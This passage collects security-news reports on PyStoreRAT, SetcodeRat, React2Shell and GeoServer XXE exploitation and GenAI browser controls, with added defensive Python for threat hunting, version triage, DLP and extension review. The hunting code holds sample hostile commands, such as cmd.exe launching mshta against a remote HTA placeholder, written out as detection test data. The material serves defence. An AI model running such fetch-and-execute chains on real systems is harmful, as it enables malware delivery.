    It’s currently not known who is behind the operation, but the presence of Russian-language artifacts and coding patterns alludes to a threat actor of likely Eastern European origin, Morphisec said.

    “PyStoreRAT represents a shift toward modular, script-based implants that can adapt to security controls and deliver multiple payload formats,” Edri concluded. “Its use of HTA/JS for execution, Python loaders for delivery, and Falcon-aware evasion logic creates a stealthy first-stage foothold that traditional EDR solutions detect only late in the infection chain.”
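    The execution chain described above (a script interpreter starting “mshta.exe” against a remote HTA, directly or through “cmd.exe,” followed by an NVIDIA-themed scheduled task) can be hunted in process-creation telemetry. The sketch below is an added example, not code from Morphisec or The Hacker News; the event fields, the interpreter list, the task-name test, and every sample event are assumptions constructed for illustration.

```python
import ntpath
import re
from dataclasses import dataclass

# Interpreters a Python or JavaScript loader stub runs under (assumed list).
SCRIPT_HOSTS = {"python.exe", "pythonw.exe", "py.exe", "node.exe"}
REMOTE_URL = re.compile(r"https?://", re.IGNORECASE)
TASK_NAME = re.compile(r'/tn\s+(?:"([^"]+)"|(\S+))', re.IGNORECASE)


@dataclass(frozen=True)
class ProcEvent:
    pid: int
    ppid: int
    image: str    # full path of the started process
    cmdline: str


def image_name(event):
    return ntpath.basename(event.image).lower()


def ancestry(event, by_pid, max_depth=5):
    """Image names of parent, grandparent, ... (nearest first)."""
    chain, seen, cur = [], {event.pid}, by_pid.get(event.ppid)
    while cur is not None and cur.pid not in seen and len(chain) < max_depth:
        chain.append(image_name(cur))
        seen.add(cur.pid)
        cur = by_pid.get(cur.ppid)
    return chain


def detect(events):
    """Return (pid, rule, detail) for each event matching a rule."""
    by_pid = {e.pid: e for e in events}
    findings = []
    for e in events:
        name, chain = image_name(e), ancestry(e, by_pid)
        # Rule 1: mshta.exe loading a remote HTA, started by a script
        # interpreter directly or through an intermediate cmd.exe.
        if (name == "mshta.exe" and REMOTE_URL.search(e.cmdline)
                and SCRIPT_HOSTS.intersection(chain)):
            hop = "via cmd.exe" if chain[0] == "cmd.exe" else "direct"
            findings.append((e.pid, "remote-hta-from-script-host", hop))
        # Rule 2: NVIDIA-themed scheduled task created from a process tree
        # that contains mshta.exe (the task-name test is an assumption).
        if name == "schtasks.exe" and "/create" in e.cmdline.lower():
            m = TASK_NAME.search(e.cmdline)
            task = (m.group(1) or m.group(2)) if m else ""
            if "nvidia" in task.lower() and "mshta.exe" in chain:
                findings.append((e.pid, "nvidia-themed-task-from-mshta", task))
    return findings


SYS32 = "C:\\Windows\\System32\\"
HTA_URL = "https://loader.example.invalid/stage.hta"   # placeholder URL
# Constructed process-creation events, not taken from the report.
SAMPLE = [
    ProcEvent(100, 4, "C:\\Windows\\explorer.exe", "explorer.exe"),
    ProcEvent(200, 100, "C:\\Python312\\python.exe", "python.exe tool.py"),
    ProcEvent(210, 200, SYS32 + "cmd.exe", "cmd.exe /c mshta.exe " + HTA_URL),
    ProcEvent(220, 210, SYS32 + "mshta.exe", "mshta.exe " + HTA_URL),
    ProcEvent(230, 220, SYS32 + "schtasks.exe",
              'schtasks.exe /create /tn "NVIDIA App SelfUpdate" /sc daily'),
    ProcEvent(300, 100, SYS32 + "mshta.exe", "mshta.exe C:\\Apps\\help.hta"),
    ProcEvent(310, 200, SYS32 + "mshta.exe", "mshta.exe " + HTA_URL),
    ProcEvent(400, 100, SYS32 + "schtasks.exe",
              'schtasks.exe /create /tn "NVIDIA Updater" /sc daily'),
]

if __name__ == "__main__":
    for finding in detect(SAMPLE):
        print(finding)
```

    Walking the ancestry rather than checking only the direct parent is what keeps the “cmd.exe” detour from hiding the interpreter that started the chain.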

    The disclosure comes as Chinese security vendor QiAnXin detailed another new remote access trojan (RAT) codenamed SetcodeRat that has likely been propagated across the country since October 2025 via malvertising lures. Hundreds of computers, including those belonging to governments and enterprises, are said to have been infected in a span of one month.

    “The malicious installation package will first verify the region of the victim,” the QiAnXin Threat Intelligence Center said. “If it is not in the Chinese-speaking area, it will automatically exit.”

    The malware is disguised as legitimate installers for popular programs like Google Chrome and proceeds to the next stage only if the system language corresponds to Mainland China (Zh-CN), Hong Kong (Zh-HK), Macao (Zh-MO), or Taiwan (Zh-TW). It also terminates the execution if a connection to a Bilibili URL (“api.bilibili[.]com/x/report/click/now”) is unsuccessful.

    In the next stage, an executable named “pnm2png.exe” is launched to sideload “zlib1.dll,” which then decrypts the contents of a file called “qt.conf” and runs it. The decrypted payload is a DLL that embeds the RAT payload. SetcodeRat can either connect to Telegram or a conventional command-and-control (C2) server to retrieve instructions and carry out data theft.

    This enables the malware to take screenshots, log keystrokes, read folders, set folders, start processes, run “cmd.exe,” set socket connections, collect system and network connection information, and update itself to a new version.


    Source: thehackernews.com…

  • React2Shell Exploitation Escalates into Large-Scale Global Attacks, Forcing Emergency Mitigation

    Dec 12, 2025 | Ravie Lakshmanan | Vulnerability / Threat Intelligence

    The U.S. Cybersecurity and Infrastructure Security Agency (CISA) has urged federal agencies to patch the recent React2Shell vulnerability by December 12, 2025, amid reports of widespread exploitation.

    The critical vulnerability, tracked as CVE-2025-55182 (CVSS score: 10.0), affects the React Server Components (RSC) Flight protocol. The underlying cause of the issue is an unsafe deserialization that allows an attacker to inject malicious logic that the server executes in a privileged context. It also affects other frameworks, including Next.js, Waku, Vite, React Router, and RedwoodSDK.

    “A single, specially crafted HTTP request is sufficient; there is no authentication requirement, user interaction, or elevated permissions involved,” Cloudforce One, Cloudflare’s threat intelligence team, said. “Once successful, the attacker can execute arbitrary, privileged JavaScript on the affected server.”

    Since its public disclosure on December 3, 2025, the shortcoming has been exploited by multiple threat actors in various campaigns to engage in reconnaissance efforts and deliver a wide range of malware families.

    The development prompted CISA to add it to its Known Exploited Vulnerabilities catalog last Friday, giving federal agencies until December 26 to apply the fixes. The deadline has since been revised to December 12, 2025, an indication of the severity of the incident.

    Cloud security company Wiz said it has observed a “rapid wave of opportunistic exploitation” of the flaw, with a vast majority of the attacks targeting internet-facing Next.js applications and other containerized workloads running in Kubernetes and managed cloud services.

    Cloudflare, which is also tracking ongoing exploitation activity, said threat actors have conducted searches using internet-wide scanning and asset discovery platforms to find exposed systems running React and Next.js applications. Notably, some of the reconnaissance efforts have excluded Chinese IP address spaces from their searches.

    “Their highest-density probing occurred against networks in Taiwan, Xinjiang Uyghur, Vietnam, Japan, and New Zealand – regions frequently associated with geopolitical intelligence collection priorities,” the web infrastructure company said.

    The observed activity is also said to have targeted, albeit more selectively, government (.gov) websites, academic research institutions, and critical‑infrastructure operators. This included a national authority responsible for the import and export of uranium, rare metals, and nuclear fuel.

    Some of the other notable findings are listed below –

    • Prioritizing high‑sensitivity technology targets such as enterprise password managers and secure‑vault services, likely with the goal of perpetrating supply chain attacks
    • Targeting edge‑facing SSL VPN appliances whose administrative interfaces may incorporate React-based components
    • Early scanning and exploitation attempts originated from IP addresses previously associated with Asia-affiliated threat clusters

    In its own analysis of honeypot data, Kaspersky said it recorded over 35,000 exploitation attempts on a single day on December 10, 2025, with the attackers first probing the system by running commands like whoami, before dropping cryptocurrency miners or botnet malware families like Mirai/Gafgyt variants and RondoDox.

    Security researcher Rakesh Krishnan has also discovered an open directory hosted on “154.61.77[.]105:8082” that includes a proof-of-concept (PoC) exploit script for CVE-2025-55182 along with two other files –

    • “domains.txt,” which contains a list of 35,423 domains
    • “next_target.txt,” which contains a list of 596 URLs, including companies like Dia Browser, Starbucks, Porsche, and Lululemon

    It has been assessed that the unidentified threat actor is actively scanning the internet based on targets added to the second file, infecting hundreds of pages in the process.

    According to the latest data from The Shadowserver Foundation, there are more than 137,200 internet-exposed IP addresses running vulnerable code as of December 11, 2025. Of these, over 88,900 instances are located in the U.S., followed by Germany (10,900), France (5,500), and India (3,600).


    Source: thehackernews.com…

  • CISA Flags Actively Exploited GeoServer XXE Flaw in Updated KEV Catalog

    Dec 12, 2025 | Ravie Lakshmanan | Vulnerability / Server Security

    The U.S. Cybersecurity and Infrastructure Security Agency (CISA) on Thursday added a high-severity security flaw impacting OSGeo GeoServer to its Known Exploited Vulnerabilities (KEV) catalog, based on evidence of active exploitation in the wild.

    The vulnerability in question is CVE-2025-58360 (CVSS score: 8.2), an unauthenticated XML External Entity (XXE) flaw that affects all versions prior to and including 2.25.5, and from versions 2.26.0 through 2.26.1. It has been patched in versions 2.25.6, 2.26.2, 2.27.0, 2.28.0, and 2.28.1. Artificial intelligence (AI)-powered vulnerability discovery platform XBOW has been acknowledged for reporting the issue.

    “OSGeo GeoServer contains an improper restriction of XML external entity reference vulnerability that occurs when the application accepts XML input through a specific endpoint /geoserver/wms operation GetMap and could allow an attacker to define external entities within the XML request,” CISA said.

    The following packages are affected by the flaw –

    • docker.osgeo.org/geoserver
    • org.geoserver.web:gs-web-app (Maven)
    • org.geoserver:gs-wms (Maven)

    Successful exploitation of the vulnerability could allow an attacker to access arbitrary files from the server’s file system, conduct Server-Side Request Forgery (SSRF) to interact with internal systems, or launch a denial-of-service (DoS) attack by exhausting resources, the maintainers of the open-source software said in an alert published late last month.

    There are currently no details available on how the security defect is being abused in real-world attacks. However, a bulletin from the Canadian Centre for Cyber Security on November 28, 2025, said “an exploit for CVE-2025-58360 exists in the wild.”

    It’s worth noting that another critical flaw in the same software (CVE-2024-36401, CVSS score: 9.8) has been exploited by multiple threat actors over the past year. Federal Civilian Executive Branch (FCEB) agencies are advised to apply the required fixes by January 1, 2026, to secure their networks.
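    For triage, the version ranges and the endpoint named above translate into two checks: which deployed GeoServer versions fall in the affected ranges, and which logged requests to /geoserver/wms carry a DOCTYPE or ENTITY declaration. This is an added example, not code from CISA, OSGeo, or the article; the inventory, host names, and request bodies are constructed, and treating any DTD declaration sent to that endpoint as review-worthy is an assumption.

```python
import codecs
import re

DTD_MARKER = re.compile(r"<!(?:DOCTYPE|ENTITY)\b", re.IGNORECASE)


def parse_version(text):
    """'2.26.1', '2.24.3-SNAPSHOT' or an image tag -> (2, 26, 1)."""
    m = re.search(r"(\d+)\.(\d+)(?:\.(\d+))?", text)
    if m is None:
        raise ValueError(f"no version number in {text!r}")
    return tuple(int(part or 0) for part in m.groups())


def is_affected(version_text):
    """Affected: up to and including 2.25.5, and 2.26.0 through 2.26.1."""
    v = parse_version(version_text)
    return v <= (2, 25, 5) or (2, 26, 0) <= v <= (2, 26, 1)


def decode_body(raw):
    """Honour a UTF-16 BOM so the marker search is not blinded by encoding."""
    if raw.startswith((codecs.BOM_UTF16_LE, codecs.BOM_UTF16_BE)):
        return raw.decode("utf-16", errors="replace")
    return raw.decode("utf-8", errors="replace")


def declares_dtd(path, raw_body):
    """True when a request to /geoserver/wms carries a DOCTYPE or ENTITY."""
    endpoint = path.split("?", 1)[0].rstrip("/").lower()
    if not endpoint.endswith("/geoserver/wms"):
        return False
    return DTD_MARKER.search(decode_body(raw_body)) is not None


def triage(inventory, requests):
    """Return (affected hosts, ids of requests to review)."""
    hosts = sorted(h for h, ver in inventory.items() if is_affected(ver))
    hits = [r["id"] for r in requests if declares_dtd(r["path"], r["body"])]
    return hosts, hits


# Constructed inventory and request bodies, for illustration only.
INVENTORY = {
    "gis-a": "2.25.5",
    "gis-b": "2.25.6",
    "gis-c": "docker.osgeo.org/geoserver:2.26.1",
    "gis-d": "2.26.2",
    "gis-e": "2.24.3-SNAPSHOT",
    "gis-f": "2.28.1",
}
DTD_BODY = '<!DOCTYPE r [<!ENTITY e "constructed">]><r/>'
REQUESTS = [
    {"id": "r1", "path": "/geoserver/wms", "body": b"<r>no dtd</r>"},
    {"id": "r2", "path": "/geoserver/wms", "body": DTD_BODY.encode()},
    {"id": "r3", "path": "/geoserver/wms?service=WMS",
     "body": DTD_BODY.encode("utf-16")},
    {"id": "r4", "path": "/static/upload", "body": DTD_BODY.encode()},
]

if __name__ == "__main__":
    print(triage(INVENTORY, REQUESTS))
```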


    Source: thehackernews.com…

  • Securing GenAI in the Browser: Policy, Isolation, and Data Controls That Actually Work

    The browser has become the main interface to GenAI for most enterprises: from web-based LLMs and copilots, to GenAI‑powered extensions and agentic browsers like ChatGPT Atlas. Employees are leveraging the power of GenAI to draft emails, summarize documents, work on code, and analyze data, often by copying/pasting sensitive information directly into prompts or uploading files.

    Traditional security controls were not designed to understand this new prompt‑driven interaction pattern, leaving a critical blind spot where risk is highest. Security teams are simultaneously under pressure to enable more GenAI platforms because they clearly boost productivity.

    Simply blocking AI is unrealistic. The more sustainable approach is to secure GenAI platforms where they are accessed by users: inside the browser session.

    The GenAI browser threat model

    The GenAI‑in‑the‑browser threat model must be approached differently from traditional web browsing due to several key factors.

    1. Users routinely paste entire documents, code, customer records, or sensitive financial information into prompt windows. This can lead to data exposure or long‑term retention in the LLM system.
    2. File uploads create similar risks when documents are processed outside of approved data‑handling pipelines or regional boundaries, putting organizations in jeopardy of violating regulations.
    3. GenAI browser extensions and assistants often require broad permissions to read and modify page content. This includes data from internal web apps that users never intended to share with external services.
    4. Mixed use of personal and corporate accounts in the same browser profile complicates attribution and governance.

    All of these behaviors put together create a risk surface that is invisible to many legacy controls.

    Policy: defining safe use in the browser

    A workable GenAI security strategy in the browser starts with a clear, enforceable policy that defines what “safe use” means.

    CISOs should categorize GenAI tools into sanctioned services and allow/disallow public tools and applications with different risk treatments and monitoring levels. After setting clear boundaries, enterprises can then align browser‑level enforcement so that the user experience matches the policy intent.

    A strong policy consists of specifications around which data types are never allowed in GenAI prompts or uploads. Common restricted categories can include regulated personal data, financial details, legal information, trade secrets, and source code. The policy language should also be concrete and consistently enforced by technical controls rather than relying on user judgment.

    Behavioral guardrails that users can live with

    Beyond allowing or disallowing applications, enterprises need guardrails that define how employees should access and use GenAI in the browser. Requiring single sign‑on and corporate identities for all sanctioned GenAI services can improve visibility and control while reducing the likelihood that data ends up in unmanaged accounts.

    Exception handling is equally important, as teams such as research or marketing may require more permissive GenAI access. Others, like finance or legal, may need stricter guardrails. A formal process for requesting policy exceptions, time‑based approvals, and review cycles allows flexibility. These behavioral elements make technical controls more predictable and acceptable to end users.

    Isolation: containing risk without harming productivity

    Isolation is the second major pillar of securing browser-based GenAI use. Instead of a binary model, organizations can use specific approaches to reduce risk when GenAI is being accessed. Dedicated browser profiles, for example, create boundaries between sensitive internal apps and GenAI‑heavy workflows.

    Per‑site and per‑session controls provide another layer of defense. For example, a security team may allow GenAI access to designated “safe” domains while restricting the ability of AI tools and extensions to read content from high‑sensitivity applications like ERP or HR systems.

    This approach enables employees to continue using GenAI for generic tasks while reducing the likelihood that confidential data is being shared with third‑party tools accessed inside the browser.

    Data controls: precision DLP for prompts and pages

    Policy defines the intent, and isolation limits exposure. Data controls provide the precise enforcement mechanism at the browser edge. Inspecting user actions like copy/paste, drag‑and‑drop, and file uploads at the point where they leave trusted apps and enter GenAI interfaces is critical.

    Effective implementations should support multiple enforcement modes: monitor‑only, user warnings, in‑time education, and hard blocks for clearly prohibited data types. This tiered approach helps reduce user friction while preventing serious leaks.
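    The tiered enforcement described above can be expressed as a small decision function: classify the text about to enter a prompt, then take the strictest mode that the policy assigns to any detected data type for that destination. This is an added example, not code from the article or from any SEB product; the data types, patterns, policy table, and the sanctioned host name are all assumptions.

```python
import re
from enum import IntEnum


class Mode(IntEnum):
    ALLOW = 0
    MONITOR = 1    # log only
    WARN = 2       # user warning
    EDUCATE = 3    # in-time education
    BLOCK = 4      # hard block


CARD = re.compile(r"\b\d(?:[ -]?\d){12,18}\b")
PEM_KEY = re.compile(r"-----BEGIN (?:[A-Z]+ )*PRIVATE KEY-----")
EMAIL = re.compile(r"\b[\w.+-]+@[\w-]+(?:\.[\w-]+)+\b")
MARKING = re.compile(r"\b(?:confidential|internal only)\b", re.IGNORECASE)

# Assumed policy: data type -> (mode on a sanctioned tool, mode elsewhere).
POLICY = {
    "payment_card": (Mode.BLOCK, Mode.BLOCK),
    "private_key": (Mode.BLOCK, Mode.BLOCK),
    "confidential_marking": (Mode.EDUCATE, Mode.BLOCK),
    "email_address": (Mode.MONITOR, Mode.WARN),
}
SANCTIONED = {"genai.corp.example"}   # placeholder host name


def luhn_ok(digits):
    """Luhn checksum, used to drop digit runs that are not card numbers."""
    total = 0
    for i, ch in enumerate(reversed(digits)):
        d = int(ch)
        if i % 2 == 1:
            d = d * 2 - 9 if d > 4 else d * 2
        total += d
    return total % 10 == 0


def classify(text):
    """Return the set of restricted data types found in the text."""
    found = set()
    for m in CARD.finditer(text):
        if luhn_ok(re.sub(r"\D", "", m.group())):
            found.add("payment_card")
    if PEM_KEY.search(text):
        found.add("private_key")
    if MARKING.search(text):
        found.add("confidential_marking")
    if EMAIL.search(text):
        found.add("email_address")
    return found


def decide(text, destination_host):
    """Return (strictest applicable mode, sorted data types)."""
    types = classify(text)
    column = 0 if destination_host.lower() in SANCTIONED else 1
    mode = max((POLICY[t][column] for t in types), default=Mode.ALLOW)
    return mode, sorted(types)


if __name__ == "__main__":
    print(decide("card 4111 1111 1111 1111", "genai.corp.example"))
```

    The Luhn check is what keeps order numbers and other long digit runs from triggering hard blocks, which is where most user friction in pattern-based DLP comes from.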

    Managing GenAI browser extensions

    GenAI‑powered browser extensions and side panels are a tricky risk category. Many offer convenient features like page summarizations, creating replies, or data extraction. But doing so often requires extensive permissions to read and modify page content, keystrokes, and clipboard data. Without oversight, these extensions can become an exfiltration channel for sensitive information.

    CISOs must be aware of the AI‑powered extensions in use at their enterprise, classify them by risk level, and enforce a default‑deny or allowed‑with‑restrictions list. Using a Secure Enterprise Browser (SEB) for continuous monitoring of newly installed or updated extensions helps identify changes in permissions that may introduce new risks over time.
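    Monitoring updated extensions for permission changes comes down to diffing the access surface of two manifest.json versions. The sketch below is an added example, not code from the article or from any SEB product; the watch-lists and both sample manifests are assumptions constructed for illustration.

```python
BROAD_HOSTS = {"<all_urls>", "*://*/*", "http://*/*", "https://*/*"}
# Assumed watch-lists; tune both to local policy.
SENSITIVE_PERMISSIONS = {"clipboardRead", "cookies", "debugger",
                         "scripting", "webRequest"}
GENAI_HOSTS = ("chatgpt.com", "claude.ai", "gemini.google.com")


def is_host_pattern(value):
    return value == "<all_urls>" or "://" in value


def access_surface(manifest):
    """Return (api_permissions, host_patterns) for a parsed manifest.json.

    Manifest V2 mixes host patterns into "permissions"; V3 uses
    "host_permissions". Content-script matches count as host access too.
    """
    declared = list(manifest.get("permissions", []))
    hosts = set(manifest.get("host_permissions", []))
    hosts.update(v for v in declared if is_host_pattern(v))
    for script in manifest.get("content_scripts", []):
        hosts.update(script.get("matches", []))
    apis = {v for v in declared if not is_host_pattern(v)}
    return apis, hosts


def review_update(old_manifest, new_manifest):
    """Classify what an update adds: 'none', 'review' or 'high'."""
    old_apis, old_hosts = access_surface(old_manifest)
    new_apis, new_hosts = access_surface(new_manifest)
    added_apis = sorted(new_apis - old_apis)
    added_hosts = sorted(new_hosts - old_hosts)
    reasons = [f"sensitive permission: {p}" for p in added_apis
               if p in SENSITIVE_PERMISSIONS]
    reasons += [f"broad host access: {h}" for h in added_hosts
                if h in BROAD_HOSTS]
    reasons += [f"GenAI site access: {h}" for h in added_hosts
                if any(g in h for g in GENAI_HOSTS)]
    if reasons:
        level = "high"
    elif added_apis or added_hosts:
        level = "review"
    else:
        level = "none"
    return {"level": level, "added_permissions": added_apis,
            "added_hosts": added_hosts, "reasons": reasons}


# Constructed manifests, for illustration only.
OLD = {"manifest_version": 3, "version": "1.0.0",
       "permissions": ["proxy", "storage"]}
NEW_MINOR = {"manifest_version": 3, "version": "1.0.1",
             "permissions": ["proxy", "storage", "alarms"]}
NEW_AI = {"manifest_version": 3, "version": "1.1.0",
          "permissions": ["proxy", "storage", "scripting"],
          "content_scripts": [{"matches": ["https://chatgpt.com/*",
                                           "https://claude.ai/*"],
                               "js": ["executor.js"]}]}

if __name__ == "__main__":
    print(review_update(OLD, NEW_AI))
```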

    Identity, accounts, and session hygiene

    Identity and session handling are central to GenAI browser security because they determine which data belongs to which account. Enforcing SSO for sanctioned GenAI platforms and tying usage back to enterprise identities will simplify logging and incident response. Browser‑level controls can help prevent cross‑access between work and personal contexts. For example, organizations can block copying content from corporate apps into GenAI applications when the user has not been authenticated into a corporate account.

    Visibility, telemetry, and analytics

    Ultimately, a working GenAI security program relies on accurate visibility into how employees are using browser-based GenAI tools. Tracking which domains and apps are accessed, the contents being entered into prompts, and how often policies trigger warnings or blocks is necessary. Aggregating this telemetry into existing logging and SIEM infrastructure allows security teams to identify patterns, outliers, and incidents.

    Analytics built on this data can help highlight genuine risk. For example, enterprises can make a clear determination between non‑sensitive vs proprietary source code being entered into prompts. Using this information, SOC teams can refine rules, adjust isolation levels, and target training where it will provide the greatest impact.

    Change management and user education

    CISOs with successful GenAI security programs invest in the time to explain the “why” behind restrictions. By sharing concrete scenarios that resonate with different roles, you can reduce the chances of your program failing – developers need examples related to IP, while sales and support staff benefit from stories about customer trust and contract details. Sharing scenario‑based content with relevant parties will reinforce good habits in the right moments.

    When employees understand that guardrails are designed to preserve their ability to use GenAI at scale, not hinder them, they are more likely to follow the guidelines. Aligning communications with broader AI governance initiatives helps position browser‑level controls as part of a cohesive strategy rather than an isolated one.

    A practical 30‑day rollout approach

    Many organizations are looking for a pragmatic path to move from ad‑hoc browser-based GenAI usage to a structured, policy‑driven model.

    One effective way of doing so is utilizing a Secure Enterprise Browsing (SEB) platform that can provide you with the visibility and reach needed. With the right SEB you can map the current GenAI tools used within your enterprise, so you can create policy decisions like monitoring‑only or warn‑and‑educate modes for clearly risky behaviors. Over the following weeks, enforcement can be expanded to more users and higher‑risk data types, FAQs, and training.

    By the end of a 30‑day period, many organizations can formalize their GenAI browser policy, integrate alerts into SOC workflows, and establish a cadence for adjusting controls as usage evolves.

    Turning the browser into the GenAI control plane

    As GenAI continues to spread across SaaS apps and web pages, the browser remains the central interface through which most employees access them. The best GenAI protections simply cannot be worked into legacy perimeter controls. Enterprises can achieve the best results by treating the browser as the primary control plane. This approach gives security teams meaningful ways to reduce data leakage and compliance risk while simultaneously preserving the productivity benefits that make GenAI so powerful.

    With well‑designed policies, measured isolation strategies, and browser‑native data protections, CISOs can move from reactive blocking to confident, large‑scale enablement of GenAI across their entire workforce.

    To learn more about Secure Enterprise Browsers (SEB) and how they can secure GenAI use at your organization, speak to a Seraphic expert.

    This article is a contributed piece from one of our valued partners.


    Source: thehackernews.com…